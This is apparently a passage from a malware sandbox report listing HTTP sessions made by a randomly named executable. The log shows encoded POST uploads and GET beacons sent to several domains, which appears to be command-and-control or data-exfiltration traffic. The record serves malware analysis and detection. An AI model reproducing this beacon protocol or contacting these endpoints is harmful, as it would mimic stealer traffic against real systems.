                                                                            25 | 192.168.2.4 | 49769 | 172.82.177.221 | 80 | 5740 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jun 19, 2024 22:40:29.074364901 CEST | 429 | OUT | GET /2ha1/?8FiTp=kJrtnVsPEnF0JV&tF1tk6=r6q+x3A/FEQLw6gnIIDKqn7cXK90QEz4MeLNvFaSJRcJ7hS0Yil9+YspC9bp8TGkQ6fd6C5Pq3eWOBjFGqN2KETivrZrq09Pe+ZYF4dhJGLDVCdvvTj0Vf0= HTTP/1.1
                                                                            Host: www.931951.com
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
Jun 19, 2024 22:40:29.645574093 CEST | 917 | IN | HTTP/1.1 200 OK
                                                                            Server: nginx
                                                                            Date: Wed, 19 Jun 2024 20:40:29 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 781
                                                                            Connection: close
                                                                            Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);})();</script></head><script language="javascript" type="text/javascript" src="/common.js"></script><script language="javascript" type="text/javascript" src="/tj.js"></script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.4 | 49770 | 15.204.0.108 | 80 | 5740 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
Timestamp | Bytes transferred | Direction | Data
Jun 19, 2024 22:40:35.180716038 CEST | 702 | OUT | POST /egr4/ HTTP/1.1
                                                                            Host: www.srripaspocon.org
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 203
                                                                            Origin: http://www.srripaspocon.org
                                                                            Referer: http://www.srripaspocon.org/egr4/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Ascii: tF1tk6=DqO7igyO8zuopn8TQnlRBGQxy7e2xQTIdtjtyHw/9YFrXx6ZqJrqOgrpp1tPN5NT50/MUpfq6/P9nmSVIMqDlBvM1v5o/tr4RzqVnsWjX0KGwI2daXIde4JQZNMAyx8l+/VGw4uBX3D1xc11Ajmg288A3dvN9mIqCDZHlA6AwfUWHnreqWtOPtZE8i2Lxd7ZlA==
Jun 19, 2024 22:40:35.772183895 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            Pragma: no-cache
                                                                            Content-Type: text/html
                                                                            Content-Length: 1236
                                                                            Date: Wed, 19 Jun 2024 20:40:35 GMT
                                                                            Server: LiteSpeed
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" hr
Jun 19, 2024 22:40:35.772567987 CEST | 238 | IN
                                                                            Data Ascii: ef="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.4 | 49771 | 15.204.0.108 | 80 | 5740 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
Timestamp | Bytes transferred | Direction | Data
Jun 19, 2024 22:40:37.720072031 CEST | 722 | OUT | POST /egr4/ HTTP/1.1
                                                                            Host: www.srripaspocon.org
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 223
                                                                            Origin: http://www.srripaspocon.org
                                                                            Referer: http://www.srripaspocon.org/egr4/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Ascii: tF1tk6=DqO7igyO8zuo7UkTWwJRQWQ2x7e26wTMdt/tyG0Vo7trXUWZkorqNgrpmVtKVZNa50ysUpzq6/b9nkKVIfSE3hvS9P5mxNr4RzqVno30XwuGw7udVTUaAoJTP9MA2x8p+/Vgw6bmX171xZR1OSmjjM8azdux5EEmFi1KiQTh4LEoPB6E7nMZdt93hl//8eGQ+Jj+QzUtFqlIzk1N3JbuVeU=
Jun 19, 2024 22:40:38.339539051 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            Pragma: no-cache
                                                                            Content-Type: text/html
                                                                            Content-Length: 1236
                                                                            Date: Wed, 19 Jun 2024 20:40:38 GMT
                                                                            Server: LiteSpeed
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" hr
Jun 19, 2024 22:40:38.339600086 CEST | 238 | IN
                                                                            Data Ascii: ef="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.4 | 49772 | 15.204.0.108 | 80 | 5740 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
Timestamp | Bytes transferred | Direction | Data
Jun 19, 2024 22:40:40.247488976 CEST | 10804 | OUT | POST /egr4/ HTTP/1.1
                                                                            Host: www.srripaspocon.org
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 10303
                                                                            Origin: http://www.srripaspocon.org
                                                                            Referer: http://www.srripaspocon.org/egr4/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
Jun 19, 2024 22:40:40.867074013 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            Pragma: no-cache
                                                                            Content-Type: text/html
                                                                            Content-Length: 1236
                                                                            Date: Wed, 19 Jun 2024 20:40:40 GMT
                                                                            Server: LiteSpeed
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" hr
Jun 19, 2024 22:40:40.867122889 CEST | 238 | IN
                                                                            Data Ascii: ef="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.4 | 49773 | 15.204.0.108 | 80 | 5740 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
Timestamp | Bytes transferred | Direction | Data
Jun 19, 2024 22:40:42.779244900 CEST | 435 | OUT | GET /egr4/?tF1tk6=OombhWzhkCuNqFAREgI5QSI/n6iJ7yj7Rc3Pxm83mLxAAziOmqPFMSLkiV9xX+4t83HRZJys59Cvhm/US+qC0S7x9ud02r6ucB+LtM+AWVrEw63feFc+fJU=&8FiTp=kJrtnVsPEnF0JV HTTP/1.1
                                                                            Host: www.srripaspocon.org
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
Jun 19, 2024 22:40:43.373780012 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            Pragma: no-cache
                                                                            Content-Type: text/html
                                                                            Content-Length: 1236
                                                                            Date: Wed, 19 Jun 2024 20:40:43 GMT
                                                                            Server: LiteSpeed
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" hr
Jun 19, 2024 22:40:43.373861074 CEST | 238 | IN
                                                                            Data Ascii: ef="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.4 | 49774 | 194.9.94.86 | 80 | 5740 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
Timestamp | Bytes transferred | Direction | Data
Jun 19, 2024 22:40:56.623074055 CEST | 708 | OUT | POST /r45o/ HTTP/1.1
                                                                            Host: www.torentreprenad.com
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 203
                                                                            Origin: http://www.torentreprenad.com
                                                                            Referer: http://www.torentreprenad.com/r45o/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Ascii: tF1tk6=txGZWh/o/5868iHR6f9PlpemWjmJZOd5PqYSc15m6o1UrcPPoe18mqvsAAGmki/yAivl9HXSmPvAFlPZR88ys3fYA6DyAOjS4nVfhjWecRlNX/2H9YI5Yct2grmu+i4l78m+T75LxEmYbtAs5f3J6Wljs8rBXO+FwzalZROvQ2BzAJjE6Ef8aZhXmXz5S+Ly9A==
Jun 19, 2024 22:40:57.258317947 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                            Server: nginx
                                                                            Date: Wed, 19 Jun 2024 20:40:57 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            X-Powered-By: PHP/8.1.24
                                                                            Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                                            Jun 19, 2024 22:40:57.258400917 CEST | 224 | IN
                                                                            Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.
                                                                            Jun 19, 2024 22:40:57.258450985 CEST | 1236 | IN
                                                                            Data Ascii: 0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/responsive/styles/reset.css" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/shared/style/
                                                                            Jun 19, 2024 22:40:57.258498907 CEST | 1236 | IN
                                                                            Data Ascii: gin to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=login">Loopia Customer zone</a> and actualize your plan.</p> <div class="divider"></div>
                                                                            Jun 19, 2024 22:40:57.258548021 CEST | 1236 | IN
                                                                            Data Ascii: S, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=dns">Read more at loopia.co
                                                                            Jun 19, 2024 22:40:57.258599997 CEST | 654 | IN
                                                                            Data Ascii: m_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loopia.se?utm_me


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            31 | 192.168.2.4 | 49775 | 194.9.94.86 | 80 | 5740 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jun 19, 2024 22:40:59.152934074 CEST | 728 | OUT | POST /r45o/ HTTP/1.1
                                                                            Host: www.torentreprenad.com
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 223
                                                                            Origin: http://www.torentreprenad.com
                                                                            Referer: http://www.torentreprenad.com/r45o/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Ascii: tF1tk6=txGZWh/o/586tybRp/BPjJehKzmJXud9PqUSc3V269FUy+HPpcR8hqvsIgGj8C/7AizX9CvSmP7AFnXZSLoxtnfWNaDwOujS4nVfhiygcSVNXsuHyZI2GMt3nrmuoi4h78mXT7JhxCqYbvos4O3IhGkJyMqZXfKBxwfGYja0JmBMMvyer1+rIZFk7Q6Nf927mFiHAhiqKMliC6pMXJv6tVE=
                                                                            Jun 19, 2024 22:40:59.790719032 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                            Server: nginx
                                                                            Date: Wed, 19 Jun 2024 20:40:59 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            X-Powered-By: PHP/8.1.24
                                                                            Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                                            Jun 19, 2024 22:40:59.790807962 CEST | 1236 | IN
                                                                            Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                                                                            Jun 19, 2024 22:40:59.790862083 CEST | 1236 | IN
                                                                            Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                                                                            Jun 19, 2024 22:40:59.790909052 CEST | 1236 | IN
                                                                            Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
                                                                            Jun 19, 2024 22:40:59.790963888 CEST | 878 | IN
                                                                            Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            32 | 192.168.2.4 | 49776 | 194.9.94.86 | 80 | 5740 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jun 19, 2024 22:41:01.684840918 CEST | 10810 | OUT | POST /r45o/ HTTP/1.1
                                                                            Host: www.torentreprenad.com
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 10303
                                                                            Origin: http://www.torentreprenad.com
                                                                            Referer: http://www.torentreprenad.com/r45o/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Ascii: tF1tk6=txGZWh/o/586tybRp/BPjJehKzmJXud9PqUSc3V268RUys/Po9R8gqvsGAGi8C+5Ai6c9CrCmNDADEfZX+Ux43fWE6DxAOj94nFbhjCgcSVNXuaH1II2EMt2grmi+i4J78+tT69bwyKYaP4s0cvI8WlvzMqKXfXfxz7wYmmKJkdMd5/X/B6JZIxQswu3R9Oegmy+KQqMSfZLKdYmAIig7SMS0zL2A0oVD3ARqHrFkrCAnSUstCycUzdUyXp9iA4k0MY5ybzP8tRs0hZX3rkFkQDouCIYKBjz06GwAmR/4mIYTajx9FnNDDDheKIszAYSZ0/djhh7EJw1gR3HLz3LpbR+JlKH1Qd5ZVkQIFfAYBUvzL+ri+E4X7f7Kwjz2Xa3fZ5EwZbGgBuIs9DqC7M42T4Q2zZl1VthTRNvZ1yKRhiRtXmImHp+B0EulVP96WPYM8IgFCeA+h4qBUb7aVP0ruyQEaOE+Xb/98+3++01QybCLHqbnqE/JBZW1aSQP1adq+QWPVGfzA1TYUHorW0VvsL7pwovqhpSjs3GMTftp1ofK0c4KUnjFvZ4/3N+OwgXOr7gIgYoa0c2J/62xFOVU2+12u5S7EkBH+lMZSxFGxLDWituO11+EGDGSO8e+nR40saQcCBXNLieBuabApn+oWshmrmt5epjbxzJ+O7qmB5G6JztWGK0V8pWtKXgm2ZBO8NXUasHn4FIk2S66EjSiO2BR54ieVfY7NWnUKyiLVc5pY9snuLTjaXBjXBfzJcxfKBnzMitHHRBdpskNi5jnOHhFf3DtUPT/yBBcjQiILbnHXx/JH8I4LpQKN2F8xoJl2owUt50o4zdfNEbwx6MM932FGSm+P/AkAEGZkCHcQ1DxcwUBz19lzhWK8Xi8+N7rpJFHdZTpWgtcFz6kmyUF0sOTIAiwjFldG4dXL9HK8CKNOzTTgZ8XrxlynQFP1Rvm9x7HGpj6EgCs/8Zgu6nXjgYEIKqpvBpJ2Li6TjHm/fpq [TRUNCATED]
                                                                            Jun 19, 2024 22:41:02.344038010 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                            Server: nginx
                                                                            Date: Wed, 19 Jun 2024 20:41:02 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            X-Powered-By: PHP/8.1.24
                                                                            Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                                            Jun 19, 2024 22:41:02.344183922 CEST | 1236 | IN
                                                                            Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                                                                            Jun 19, 2024 22:41:02.344253063 CEST | 1236 | IN
                                                                            Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                                                                            Jun 19, 2024 22:41:02.344301939 CEST | 1236 | IN
                                                                            Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
                                                                            Jun 19, 2024 22:41:02.344356060 CEST | 878 | IN
                                                                            Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            33 | 192.168.2.4 | 49777 | 194.9.94.86 | 80 | 5740 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jun 19, 2024 22:41:04.218070030 CEST | 437 | OUT | GET /r45o/?tF1tk6=gzu5VRbRlKcxtiemuOhQ9ZWHLhmKbuZrFroidVFNmLFBxOvIucJSpLXaDw+Y+myNYDD7xGaCks3CSH70SMI2onP9LYfMGpPV91FzvjCQRh4kOtmo5I82F50=&8FiTp=kJrtnVsPEnF0JV HTTP/1.1
                                                                            Host: www.torentreprenad.com
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Jun 19, 2024 22:41:04.873490095 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                            Server: nginx
                                                                            Date: Wed, 19 Jun 2024 20:41:04 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            X-Powered-By: PHP/8.1.24
                                                                            Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                                            Jun 19, 2024 22:41:04.873570919 CEST | 1236 | IN
